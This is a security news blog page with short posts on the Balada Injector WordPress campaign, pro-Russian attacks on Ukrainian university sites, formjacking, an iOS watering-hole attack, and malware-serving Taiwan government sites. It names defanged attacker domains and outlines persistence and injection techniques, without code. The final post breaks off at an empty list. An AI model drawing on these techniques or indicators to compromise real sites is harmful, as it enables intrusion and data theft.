Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Infected websites. Show all posts

Over 17,000 Websites Exploited in Massive Balada Injector Campaign

 

Over 17,000 WordPress websites have been compromised as a result of the notorious Balada Injector attack. The Balada Injector, discovered in 2022 but thought to have been active since 2017, weaponizes vulnerabilities in premium WordPress themes and plugins to install malicious backdoors. 

Following infection, these backdoors redirect website users to fake tech help pages, bogus lottery winnings, fraudulent push notification hoaxes, and other scams. 

With such a wide range of deceptive techniques, experts believe that Balada Injector is either a service offered to other threat actors or a direct component of a scam operation. 

The recent wave of attacks is being blamed on the tagDiv Composer plugin's CVE-2023-3169 cross-site scripting (XSS) vulnerability. This plugin is found on an estimated 155,000 websites with the Newspaper and Newsmag WordPress themes, both premium products, laying the groundwork for possible attacks. 

This effort started in September, following the public disclosure of the vulnerability and the publishing of a proof-of-concept. 

In a recent analysis, website security firm Sucuri exposed the extent of the infiltration, citing specific indications of the attack, such as a malicious script located within separate tags. Sucuri discovered six different attack waves: 

Over 5,000 websites were compromised by malicious script injections from stay.decentralappps[.]com. 

  • Making rogue WordPress administrator accounts with the login "greeceman" at first, then switching to ones that are automatically produced based on website hostnames.
  • By using the WordPress theme editor to make changes to the 404.php file for the Newspaper theme, you can gain persistence covertly.
  • The installation of the deceptive wp-zexit plugin, which emulates authorised WordPress administrator activities. 
  • Three new malicious domains with higher obfuscation were introduced, complicating detection attempts. 
  • Using promsmotion[.]com subdomains instead of the preceding domain, three distinct injection methods were discovered on a total of 235 websites. 

The CVE-2023-3169 vulnerability was used to compromise over 9,000 of the 17,000 compromised sites, demonstrating the attackers' tremendous effectiveness and ability to adapt quickly for maximum impact. 

Webmasters and site owners should immediately upgrade the tagDiv Composer plugin to version 4.2 or later, which addresses the known flaw. Regular upgrades to themes, plugins, and all website components remain critical in protecting against such formidable threats.

Cyber Attacks Targeted on Websites Using Wordpress

Thirty Ukrainian Universities were hacked as a result of the targeted cyberattack supporting Russia's attack on Ukraine. In the latest report, experts from Wordfence said that the cyber attack had massive repercussions on Ukrainian Education organizations by hackers known as Monday Group. The threat actor has openly supported Russia's invasion of Ukraine. The members of the hacking group identify themselves as 'the Mxonday' has attacked the websites using WordPress hosting more than in the past two weeks, since the start of the Russian invasion of Ukraine. 


As per the Wordfence blog, the firm protects more than 8,000 Ukranian websites, around 300 of these belong to education websites. Wordfence also offers assistance to government agencies, police, and military websites. The security firm also mentioned that it experienced a rise of 144,000 cyber attacks on February 25, the second day of the Kinetic attack. The rise is three times the number of regular attacks compared to the starting of the month across the Ukranian websites that Wordfence protects. According to founder and CEO Mark Maunder, a threat actor was continuously trying to attack Ukranian websites, immediately after the Ukranian invasion. 

An inquiry into the issue found four IP addresses associated with the campaign, these are distributed through a VPN service from Sweden. The hacking group also has ties with Brazil, Wordfence is supposed to be operating from here. But the threat actors behind the cyber attack are yet to be known. The report comes after ESET's new research, which mentioned various malware families that are used in targeted cyber attacks against organizations in Ukraine. An ESET blog reported a destructive campaign that used HermeticWiper that targets different organizations. 

The cyberattacks comprised of three elements; HermeticWiper, which corrupts a system making it inoperable, HermeticWizard, which spreads HermeticWiper across the local network via WMI and SMB, and lastly, HermeticRansom. According to the blog, the cyberattack was preceded by a few hours from the start of the Russian invasion of Ukraine. The malware used in these attacks suggests that the planning of the campaign was done months ago. HermeticWiper has been found in hundreds of systems in the last five Ukrainian organizations, says ESET. It also mentioned that no tangible connection with a known threat actor has been found yet.

Indian users third most affected by Formjacking attacks, after the US and Australia


Followed by the US and Australia, Indian users were the most exposed to Formjacking attacks, according to a new survey by cybersecurity firm, Symantec, which has blocked over 2.3 million formjacking attacks globally in the second quarter of 2019.

In 2018, American users faced 33% of the total formjacking attacks; however, during the first half of the year 2019, they became the most exposed to these attacks with more than 50% of all the global detections. On the other hand, India with 5.7% of all the global attacks ranks third, as per the Symantec report.

Formjacking, a new dangerous threat in the cyber world, operates by infecting websites via malicious codes; mainly, these are the websites that involve filling out job applications, government forms, and credit card details. Symantec carried out a comprehensive analysis of formjacking attacks in its Internet Security Threat Report (ISTR) which calls attention to the ways users and websites have been affected by this critical cyber threat in 2018-19.

“We expect this formjacking trend to continue and expand further to steal all kinds of data from web forms, not just payment card data. This also means that we are likely to see more software supply chain attacks. Unfortunately, formjacking is showing no signs of disappearing any time soon. Therefore, operators of online stores need to be aware of the risk and protect their online presence,” reads the report.

How ‘Formjacking’ Works? 

In order to inject malicious JavaScript code on the website, attackers and cybercriminals modify one of the JavaScript files which get loaded along with the website. Then, the malicious JavaScript code makes alterations in the behavior of the selected web process on the infected website which, as a result, allows hackers to unlawfully acquire credit card data and other sensitive information.

According to the findings of Symantec, the websites which are affected by Formjacking attacks stay under its influence for 46 days. A number of websites have fallen prey to formjacking, with publically reported attacks on the websites of major companies like British Airways, Ticketmaster, Feedify, and Newegg.

Warning the consumers around the globe, Candid Wueest, Principal Threat Researcher at Symantec, said, “Each month we discover thousands of formjacking infected websites, which generate millions of dollars for the cybercriminals," warned Candid Wueest, Principal Threat Researcher at Symantec.

"Consumers often don't notice that they have become a victim to a formjacking attack as it can happen on a trusted online store with the HTTPS padlock intact. Therefore, it is important to have a comprehensive security solution that can protect you against formjacking attacks," He added.

Google Project Zero Discovers Malicious Website Exploits which Affected iPhone Users



Researchers at Google Project Zero discovered an attack against iOS users which is present in the form of a malware hidden in hacked websites.

The malware stealthily installs itself for the users surfing any of the hacked websites, which have a readership base of thousands.

Once the malware is installed, it makes the iPhone act as a clandestine spying device which traces the contacts, location and messages, allowing hackers to get an overview of the victim's life and habits.

The malware extends the collection of data up to the popular third party apps such as Gmail, Whatsapp and Google Maps; it is configured to steal files and upload live location data of the owner.

The hub of white hat hackers, Google's Project Zero Division, which excelled in discovering multiple bugs and vulnerabilities, said that these attacks are based in a series of hacked sites, that were said to be randomly disseminating malware to iOS users.

The particular series of attack stands out as most of the attacks are more targeted in scope, however these attacks affected people who happened to surf one of the hacked websites.

Explaining  the issue, Ian Beer from Project Zero, says, "Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group.

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them."

Taiwan Government sites infected and used in Wire Transfer spam mails



Be careful while visiting Taiwan Government websites , it may redirect you to BlackHole Exploit kit page.  We have discovered three infected Taiwan government websites. Initially , the infection identified by @Hulk_Crusader.

"h00p://www.tai**i.gov.tw/page-3.htm <- another Taiwan .gov site distributing malware. (Copies of Policies spam)" The tweet posted by the researcher reads. At EHN, i have discovered another infected government website.

The infected sites has the same URL pattern ('page-3.htm') and contains an iframe pointing to BlackHole Exploit page "podaruno**.ru".

malicious script

After quick Google search, i come to know that the infected websites are being used in a Wire Transfer Spam mail.

Good afternoon,

Your Wire Transfer Amount: USD 92,710.37
Transaction Report: View [Link_to_infected_page]
TEMIKA Heller,
The Federal Reserve Wire Network

The list of infected websites: